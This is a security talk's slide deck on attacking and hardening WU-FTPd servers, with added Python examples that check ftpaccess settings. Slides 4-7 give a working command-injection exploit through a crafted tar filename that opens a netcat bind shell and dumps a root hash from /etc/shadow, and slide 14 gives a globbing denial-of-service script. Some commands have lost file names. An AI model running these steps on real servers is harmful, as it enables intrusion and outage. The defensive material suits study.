Attacking and Securing Unix FTP Servers

Attacking and Securing Unix FTP Servers. Jay Beale President, JJB Security Consulting Lead Developer, Bastille Linux. Contents. Simple: Working exploits against WU-FTPd Configuring WU-FTPd against attack Defeated exploits against WU-FTPd
Slide 1

Attacking and Securing Unix FTP Servers
Jay Beale
President, JJB Security Consulting
Lead Developer, Bastille Linux

Slide 2

Contents
Simple:
    Working exploits against WU-FTPd
    Configuring WU-FTPd against attack
    Defeated exploits against WU-FTPd
Where we have working exploits, we'll focus on demonstration rather than lecture.

Slide 3

FTP Conversion Vulnerability
Not a buffer overflow! Uses the "tar files up for me" feature in WU-FTPd.
Target: WU-FTPd 2.4.x - 2.6.0 (RH <=6.2, SuSE <=7.3, Immunix <=6.2)

Slide 4

Preparing to Exploit

    $ cat > script
    #!/bin/bash
    nc -l -p 6666 -e /bin/bash
    <CTRL-D>
    $ tar -cf b.tar nc script
    $ cat > blah
    #
    tar -xf b.tar
    ./script
    <CTRL-D>

Slide 5

Exploiting…

    $ csh
    $ echo > '--use-compress-program=bash blah'
    $ ftp target (login as user)
    ftp> put b.tar
    ftp> put blah
    ftp> put "--use-compress-program=bash blah"
    ftp> get "--use-compress-program=bash blah".tar

Slide 6

Remote shell

    $ nc target 6666

We have a remote shell with the privileges of the user we logged in as. If we want a rootshell, we just bring a privilege escalator with us… (Credits to SUID and Securiteam)

Slide 7

Rootshell?

    $ tar -cf b.tar nc script
    ftp target (login as same user)
    ftp> put b.tar
    ftp> get "--use-compress-program=bash blah".tar
    $ nc target 6666
    ./ userrooter by S
    grep root /etc/shadow
    root:$1$MU.tGav3$X8WISNGV92c.Oxfe0pvqb1:11870:0:99999:7:-1:-1:134538460

Slide 8

Joy.
This exploit is harder to pull off on an anonymous login, but possible. It's harder to pull off mostly because we're chrooted without far to go, with only user ftp. We can use this to protect normal user access.

Slide 9

Avoidance
We can avoid this exploit by configuring the FTP daemon to disallow tar-ring/compression. We can also make sure that anonymous users can't retrieve the files that they place on the server. Files to be downloaded again should probably be examined individually. Finally, we'll look at a path filter later in this talk.

Slide 10

Sample /etc/ftpaccess

    class all real,guest,anonymous *
    email root@localhost
    message /welcome.msg login
    message .message cwd=*
    compress yes all
    tar yes all
    chmod no guest,anonymous
    delete no guest,anonymous
    overwrite no guest,anonymous
    rename no guest,anonymous
    log transfers anonymous,real inbound,outbound
    passwd-check rfc822 warn

Slide 11

Deactivating tar, compress…
We can avoid this exploit by configuring the FTP daemon to disallow tar-ring/compression in /etc/ftpaccess:

    compress no all
    tar no all
    chmod no anonymous
    delete no anonymous
    overwrite no anonymous
    rename no anonymous

Slide 12

Anonymous Upload?
Anonymous upload is dangerous enough. We can lessen the risk greatly. First, set good perms:

    mkdir /home/ftp/incoming
    chown root.root /home/ftp/incoming
    chmod 333 /home/ftp/incoming
    chmod a-w /home/ftp

Slide 13

Anonymous Upload?
Second, configure default permissions for all incoming files, via /etc/ftpaccess:

    upload /home/ftp /incoming yes root ftp 0600 nodirs
    noretrieve /home/ftp/incoming

Slide 14

FTP globbing Vulnerability 1: Denial of Service

    #!/bin/bash
    ftp -n FTP-SERVER<<\end
    quot user anonymous
    bin
    quot pass
    ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    bye
    end

Slide 15

FTP globbing Vulnerability 1
Targets:
    WU-FTPd <=2.6.0 (RH 6.2, SuSE 7.3)
    ProFTPd <=1.2.1
Other targets:
    MacOS 10.0.0, 10.0.1
    Solaris 8
    HP-UX 11.11 (11i)

Slide 16

Avoidance/Containment
We can stop this from taking over the system by putting good resource limits in place. We'll also look at a path filter in the FTP daemon configuration.

Slide 17

FTP globbing Vulnerability #2
WU-FTPd 2.6.1 had a heap corruption vulnerability in the globbing code.

Slide 18

FTP globbing Vulnerability #2
Targets: WU-FTPd <=2.6.1 (RH 7.2, SuSE 7.3, Mdk 8.1)
Exploit is believed to be in the wild, but not publicly available.

Slide 19

Testing Vulnerability

    220 rh72 FTP server (Version wu-2.6.1-18) ready.
    Name ( anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls ~{
    227 Entering Passive Mode (127,0,0,1,116,136)
    421 Service not available, remote server has closed connection

Slide 20

Avoidance
This is in the globbing code, which we can't disable. There are no permission checks on files or other settings that we can change. Since an authenticated session is required, the only way to avoid this is to keep the attacker from logging in.

Slide 21

Containment
If we're running only an anonymous FTP server, we can set inetd/xinetd to always run it as user ftp, forcing anyone logging in to get only user ftp and to possibly get stuck in a chroot.

Slide 22

Site_Exec
WU-FTPd had a serious format string vulnerability in the SITE EXEC functionality. Even from simple anonymous access, this got you all the way to root.

Slide 23

Site_Exec
Targets:
    WU-FTPd <= 2.6.0 (RH <= 6.2, SuSE <= 7.3)
    HP-UX <= 11.11 (11i)

Slide 24

Avoidance?
SITE EXEC can't be deactivated. However, there is hope. If you only need WU-FTPd for anonymous upload/download, set inetd/xinetd to run in.ftpd as the ftp user, instead of root.

Slide 25

Avoidance?
/etc/xinetd.d/wu-ftpd:

    service ftpd
    {
        socket_type = stream
        wait = no
        user = ftp
        …
    }

inetd.conf:

    ftp stream tcp nowait ftp /usr/sbin/tcpd in.ftpd -l -a

Slide 26

Containment
Chrooting won't stop the attacker if he's root. Root can break out of chroots on many operating systems. Try not to trust the application to drop privilege – try to never give it extra privilege to drop.

Slide 27

Message Buffer Overflow
WU-FTPd optionally offers messages when you log in, change directory, trigger an error condition,… As a feature, these can include a number of "magic cookies," which WU-FTPd will substitute for, like:
    %R – client hostname
    %N – number of users in a class

Slide 28

Message Buffer Overflow
There's a buffer overflow condition in WU-FTPd's handling of these. Is this a threat?

Slide 29

Are we vulnerable?
On the positive side, most sites don't use these by default. Then again, let's look at a popular default /etc/ftpaccess file:

    # Messages displayed to the user
    message /welcome.msg login
    message .message cwd=*

Problem: if an attacker can write to any directory that doesn't have a .message file yet, he wins. (Spot the other one?)

Slide 30

Avoidance
We can avoid this by not letting an attacker write to any directory. If this isn't possible, we can block him from writing to any file that begins with a "." Finally, we can make sure that the FTP area has good permissions on its root directory.

Slide 31

Avoidance

    path-filter anonymous /etc/error ^[-A-Za-z0-9\._]*$ ^\. ^-

For any file to get through, it must match the first pattern and not match any of the following ones. Note that this stops both the message exploit here and the earlier tar vuln.
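
The two-stage rule on this slide, evaluated over candidate upload names. This is an added example, not code from the talk or from WU-FTPd; the helper names and the sample filenames are constructed for illustration, and Python's `re` stands in for the daemon's regex engine.

```python
import re

# The directive from the slide: path-filter <typelist> <msgfile> <allowed> <disallowed>...
DIRECTIVE = r"path-filter anonymous /etc/error ^[-A-Za-z0-9\._]*$ ^\. ^-"

# Constructed upload names, including the ones used earlier in the talk.
SAMPLES = ["b.tar", "blah", "report_2002.txt", ".message",
           "--use-compress-program=bash blah", "-rf", "notes.txt\n"]

def parse_path_filter(line):
    """Split a path-filter line into (typelist, msgfile, allowed, disallowed)."""
    fields = line.split()
    if len(fields) < 4 or fields[0] != "path-filter":
        raise ValueError("not a path-filter directive")
    allowed = re.compile(fields[3])
    disallowed = [re.compile(p) for p in fields[4:]]
    return fields[1].split(","), fields[2], allowed, disallowed

def upload_allowed(name, allowed, disallowed):
    """Accept a name only if it matches `allowed` and none of `disallowed`."""
    # Python's `$` also matches before a trailing newline; reject that case
    # explicitly so the check is not looser than the character class intends.
    if "\n" in name or not allowed.search(name):
        return False
    return not any(p.search(name) for p in disallowed)

def check_names(names, line=DIRECTIVE):
    """Map each candidate upload name to True (accepted) or False (rejected)."""
    _, _, allowed, disallowed = parse_path_filter(line)
    return {n: upload_allowed(n, allowed, disallowed) for n in names}

if __name__ == "__main__":
    for name, ok in check_names(SAMPLES).items():
        print(f"{'accept' if ok else 'reject'}  {name!r}")
```

Note that `.message` and `-rf` both pass the allowed-character pattern and are only stopped by the `^\.` and `^-` patterns, which is why the directive needs both stages.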

Slide 32

More Avoidance
We can also remove all the messages from our configuration file, though this is difficult, since they're pervasive. Finally, we can make sure that anonymous users can't upload files. If we have real users, though, it gets difficult.

Slide 33

More Avoidance

    # Removing messages from /etc/ftpaccess
    $ grep -v message /etc/ftpaccess > /etc/
    $ mv /etc/ /etc/ftpaccess

Slide 34

Containment
Avoidance is really better here, but we can try to contain the damage. We can contain the damage by running an anonymous-only FTP server, set by inetd/xinetd to always run as a non-root user. Remember, anonymous FTP is automatically chrooted.

Slide 35

Additional Measures
Log more, by adding this to ftpaccess:

    log security anonymous,guest,real
    log commands anonymous,guest,real

And add "real" to the list of users for whom we log transfers.

Slide 36

Go Beyond ftpusers
The traditional way of making sure that only real humans used ftp, and not system accounts, was to periodically make sure all non-humans were in /etc/ftpusers. Now, just do this in ftpaccess:

    deny-uid %-499
    deny-gid %-499
    allow-uid ftp
    allow-gid ftp

(replace 499 w/ max non-human uid/gid here)

Slide 37

Worms and Autorooters
On top of this, there are worms, mass rooters and auto rooters which automatically scan for and exploit vulnerabilities. The HoneyNet project had a system scanned and compromised by a worm within 92 seconds of it coming online.

Slide 38

Ramen Worm
Most of the worms sacrifice intelligence for speed. Ramen scans FTP server banners for build dates. Don't give away the information and this worm won't try to attack.

Slide 39

Minimizing Your Banner
In WU-FTPd's /etc/ftpaccess, add/change line:

    greeting terse

    220 target.server FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
    Name (

becomes:

    220 FTP server ready.
    Name (

Slide 40

Choosing Your Own Banner
Then again, that makes it easier for a savvy attacker to spot WU-FTPd. So, make your own line!

    greeting text FTP Server Here

    220 FTP Server here
    Name (
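
The ftpaccess recommendations from the preceding slides (conversions, upload and noretrieve, path-filter, logging, deny-uid/deny-gid, greeting) collected into one audit pass. This is an added example, not part of the talk or of WU-FTPd; the finding names are made up here, both sample files are constructed, and only the simple `upload <root-dir> <dirglob> yes ...` form is handled.

```python
# Constructed sample: the permissive settings shown in the slides plus an upload line.
SAMPLE = """\
class all real,guest,anonymous *
message .message cwd=*
compress yes all
tar yes all
upload /home/ftp /incoming yes root ftp 0600 nodirs
log transfers anonymous,real inbound,outbound
"""
# The same file with the talk's recommendations applied (also constructed).
HARDENED = SAMPLE.replace("compress yes", "compress no").replace("tar yes", "tar no") + r"""noretrieve /home/ftp/incoming
path-filter anonymous /etc/error ^[-A-Za-z0-9\._]*$ ^\. ^-
log security anonymous,guest,real
log commands anonymous,guest,real
deny-uid %-499
deny-gid %-499
greeting terse
"""

def parse(text):
    """Return each directive as a list of fields, skipping blanks and comments."""
    lines = (l.strip() for l in text.splitlines())
    return [l.split() for l in lines if l and not l.startswith("#")]

def audit(text):
    """Return finding IDs (names invented for this example) for each weakness."""
    rows = parse(text)
    def have(*prefix):
        return [r for r in rows if r[:len(prefix)] == list(prefix)]
    findings = [f"{f}-enabled" for f in ("compress", "tar")
                if any(r[1:2] == ["yes"] for r in have(f))]
    # Assumption: upload lines use the simple form without class= or absolute/relative.
    uploads = [r for r in have("upload") if r[3:4] == ["yes"]]
    protected = {p for r in have("noretrieve") for p in r[1:]}
    for r in uploads:
        target = r[1].rstrip("/") + "/" + r[2].lstrip("/")
        if target not in protected:
            findings.append(f"upload-retrievable:{target}")
    dot_blocked = any("anonymous" in r[1].split(",") and r"^\." in r[4:]
                      for r in have("path-filter") if len(r) > 4)
    if uploads and not dot_blocked:
        findings.append("no-dotfile-path-filter")
    findings += [f"log-{k}-missing" for k in ("security", "commands")
                 if not have("log", k)]
    findings += [f"{d}-missing" for d in ("deny-uid", "deny-gid") if not have(d)]
    if not (have("greeting", "terse") or have("greeting", "text")):
        findings.append("banner-discloses-version")
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE), audit(HARDENED))
```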

Slide 41

Alternatives to WU-FTPd
You can also avoid the pain of trying to avoid or contain all the ftpd root vulns. ProFTPd has a slightly better security history. OpenBSD's ftpd has an awful security history.

Slide 42

vsftpd really has never had a security i
